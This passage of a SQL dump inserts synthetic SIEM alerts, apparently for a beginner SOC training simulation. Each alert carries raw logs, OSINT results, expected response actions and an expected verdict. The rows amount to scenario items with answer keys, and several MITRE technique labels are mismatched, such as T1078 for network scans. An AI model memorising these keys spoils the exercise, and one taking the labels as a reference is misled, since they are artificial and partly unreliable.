'FINANCE', NULL, NULL, NULL, 0),
(1835, 'Routine System Health Check Activity', 'low', 'Wazuh', 'System health monitoring detected an increase in process execution from a known maintenance script.', 'System Monitoring', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"hostname\":\"monitor-01\",\"username\":\"monitor_service\",\"command_line\":\"healthcheck.sh --all\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP of the health monitoring server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"healthcheck.sh --all\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a routine system health check command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"This activity is part of scheduled system health checks.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1836, 'Misconfigured Legacy Application Detected', 'medium', 'Elastic SIEM', 'A legacy application was identified making unusual network requests. This behavior is due to misconfiguration.', 'Network Activity', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:20:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.42\",\"dst_ip\":\"203.0.113.200\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this external IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"Legacy application is misconfigured, causing unusual but benign network behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1837, 'Brute Force Login Attempt from Suspicious IP', 'high', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP. Investigation confirms it is part of a brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.76\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"web-server-01\",\"failed_attempts\":25}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Commonly targeted username in brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Reputation data corroborates the 25 failed attempts against the admin account, validating the alert; after blocking the source, check whether any attempt from this IP succeeded before resetting credentials and closing.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1838, 'Routine Vulnerability Scan Detected', 'low', 'Splunk', 'A network scan was detected originating from an internal IT management server. This activity appears to be a routine vulnerability assessment.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:23Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"svc_scan\",\"hostname\":\"IT-Scanner-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for network management tasks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity is consistent with scheduled vulnerability scans by IT.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1839, 'Unusual Email Received from Trusted Domain', 'medium', 'Proofpoint', 'An email containing a suspicious link was received from a normally trusted domain. Investigation revealed it to be a legitimate marketing campaign.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"email_sender\":\"newsletter@trustedcompany.com\",\"url\":\"https://trustedcompany.com/promo\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No negative reports associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://trustedcompany.com/promo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Verified as part of a legitimate campaign\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"OSINT confirmed the URL and sender domain as part of a legitimate marketing effort.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1840, 'Scheduled System Health Check Detected', 'low', 'Wazuh', 'A system health check script was executed, flagged by the system due to its similarity to known attack patterns. It was confirmed to be a scheduled maintenance task.', 'Command Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.150\",\"hostname\":\"Server-Maintenance\",\"command_line\":\"/usr/local/bin/syscheck.sh\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system maintenance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/local/bin/syscheck.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a routine system check script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"command_execution\",\"analysis_notes\":\"The command is part of scheduled health checks performed regularly.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1841, 'Misconfigured Application Causing Suspicious Traffic', 'medium', 'Elastic SIEM', 'High volume of outbound traffic from a legacy app server was flagged as suspicious. Investigation indicates a misconfiguration causing excess data sync.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:50:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.200\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"LegacyApp-Server\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this external IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic was due to a misconfigured sync process rather than malicious exfiltration; confirm this by matching the destination to the sync endpoint configured for the application and the volume to its sync job, since a clean reputation score for the external IP does not on its own rule out exfiltration.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1842, 'Unauthorized Credential Usage Detected', 'high', 'Azure Sentinel', 'Anomalous failed login attempt against a valid user account detected from a foreign IP. OSINT confirms this IP is associated with brute force attacks.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.12\",\"username\":\"jdoe\",\"hostname\":\"Corp-Login-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No known issues with this user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is linked to known brute force attacks, confirming malicious intent; the logged event is a failed attempt, so check whether any login by jdoe from this IP succeeded in order to scope the response.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1843, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A vulnerability scanning tool was detected scanning internal systems for vulnerabilities. The activity originated from a known internal IP address.', 'Network Scanning', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"admin\",\"hostname\":\"vulnscanner01\",\"request_body\":\"\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.101\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Tool Documentation\",\"verdict\":\"clean\",\"details\":\"Standard command for internal network scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"Routine scanning by IT department for security assessment; note that the scan ran under the shared admin account rather than a dedicated scanner service account, so confirm it against the IT scan schedule before closing.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1844, 'Suspicious Login Attempt from Authorized Backup System', 'medium', 'Azure Sentinel', 'An unusual login attempt was detected from an IP address belonging to an authorized backup system. The login attempt appears to be part of routine backup processes.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.200\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by backup systems.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Records\",\"verdict\":\"clean\",\"details\":\"Authorized user account for backup processes.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempt was part of a scheduled backup routine.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1845, 'Authorized Administrative Backup Detected', 'low', 'Wazuh', 'A scheduled administrative backup was initiated, detected as a high volume of network traffic. This is a routine operation.', 'Data Transfer', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T01:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"192.168.1.250\",\"username\":\"backup_service\",\"hostname\":\"backupserver01\",\"request_body\":\"\",\"command_line\":\"rsync -av --delete /data 192.168.1.250:/backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av --delete /data 192.168.1.250:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Procedure Manual\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"Recognized as part of routine data backup operations.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1846, 'Misconfigured Legacy Application Activity', 'medium', 'Elastic SIEM', 'A legacy application generated excessive network traffic and login attempts, which were flagged as suspicious but matched known behavior patterns.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"legacy_app\",\"hostname\":\"legacyserver01\",\"request_body\":\"\",\"command_line\":\"python legacy_script.py\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Map\",\"verdict\":\"internal\",\"details\":\"IP address of legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python legacy_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Legacy System Documentation\",\"verdict\":\"clean\",\"details\":\"Regularly executed script on legacy systems.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity consistent with routine operation of legacy applications.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1847, 'Unauthorized Application Installation Detected', 'high', 'Wazuh', 'A suspicious process execution was detected on a workstation, indicating potential unauthorized software installation.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.3.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"request_body\":\"\",\"command_line\":\"C:\\\\Temp\\\\malicious_installer.exe\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for distributing malware.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Executable file flagged as malicious by 12 antivirus engines.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive, indicating a malware infection attempt on the workstation; record the file hash of the installer so that the block_hash action and the VirusTotal verdict refer to a verifiable artifact rather than a file path.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1848, 'Routine Vulnerability Scanning Detected from Internal Network', 'low', 'Splunk', 'A series of network vulnerability scans originating from an internal IP address were detected. These scans are part of a scheduled system health check by the IT department.', 'Network Scanning', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"it_admin\",\"hostname\":\"scanner01.internal.net\",\"command_line\":\"nmap -sV -p- 192.168.1.10\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p- 192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for vulnerability assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"The activity was confirmed as a sanctioned IT operation for vulnerability scanning.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1849, 'Failed Login Attempts from External IP Address', 'medium', 'Elastic SIEM', 'Multiple failed login attempts were detected from an external IP address. These activities were investigated and found to be part of an authorized external penetration test.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"external_tester\",\"hostname\":\"webserver01.internal.net\",\"failed_attempts\":15}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for failed login attempts during authorized test\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"external_tester\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username used during authorized penetration testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was part of a scheduled penetration test with known credentials; confirm the source against the IP list in the rules of engagement and the agreed test window before closing, since the testers using this address does not make all traffic from it authorized.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1850, 'Scheduled System Backup Detected as Suspicious Activity', 'low', 'Wazuh', 'A scheduled system backup was detected, initiating large data transfers. This was flagged as suspicious but was confirmed to be part of routine operations.', 'Data Transfer', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.2.50\",\"username\":\"backup_service\",\"hostname\":\"backup01.internal.net\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for routine data backup\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_service\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for scheduled backups\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"The process was identified as a normal system backup operation.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1851, 'Misconfigured Legacy App Triggering Firewall Alerts', 'medium', 'Azure Sentinel', 'An outdated legacy application is triggering firewall alerts with its unusual traffic patterns. The application is known and regularly monitored by IT.', 'Network Traffic Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.15\",\"dst_ip\":\"198.51.100.10\",\"username\":\"legacy_user\",\"hostname\":\"legacyapp.internal.net\",\"command_line\":\"java -jar legacyapp.jar\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"java -jar legacyapp.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used to run legacy application\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic_anomaly\",\"analysis_notes\":\"The alerts were due to known traffic patterns of a monitored legacy application.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1852, 'Unauthorized Remote Access Detected from External IP', 'high', 'Wazuh', 'A successful remote access was detected from an external IP address to an internal server using valid credentials. This was identified as an unauthorized access attempt.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.30\",\"username\":\"compromised_user\",\"hostname\":\"server01.internal.net\",\"command_line\":\"ssh -i key.pem user@192.168.1.30\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username compromised in this incident\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_access\",\"analysis_notes\":\"The access was verified as unauthorized with malicious intent based on OSINT results.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1853, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'An internal vulnerability scan triggered multiple alerts due to its scanning behavior, which resembles malicious activity. The source IP belongs to the IT department.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.255\",\"username\":\"admin_scan\",\"hostname\":\"network-scanner\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.0/24\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Nmap command commonly used for network scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was identified as a routine IT vulnerability scan, not a malicious lateral movement attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1854, 'Authorized Administrative Backup Detected', 'low', 'Azure Sentinel', 'A scheduled backup operation was misidentified as data exfiltration due to high volume of data transfer. Backup is authorized and occurs weekly.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup/ remote@backup-server:/backup/\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for authorized backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ remote@backup-server:/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Rsync command used for data synchronization and backup.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity correlates with a scheduled and authorized backup operation.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1855, 'Misconfigured Legacy Application Network Activity', 'medium', 'Wazuh', 'A legacy application generated unusual network traffic patterns, triggering alerts. This activity is linked to a known misconfiguration.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.255\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server\",\"command_line\":\"/usr/bin/legacyapp --connect 192.168.2.255\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/legacyapp --connect 192.168.2.255\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used by legacy application for network communication.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is due to a known misconfiguration in a legacy application, not a lateral movement attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1856, 'Benign System Health Check Triggered Potential Threat Alert', 'low', 'Elastic SIEM', 'A scheduled system health check was flagged as a potential threat due to high-frequency network probes. Activity is part of regular maintenance.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.255\",\"username\":\"sys_health\",\"hostname\":\"health-checker\",\"command_line\":\"/usr/bin/system_check --full-scan\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for system health checks.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/system_check --full-scan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for performing full system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The activity is part of scheduled system health checks, not malware 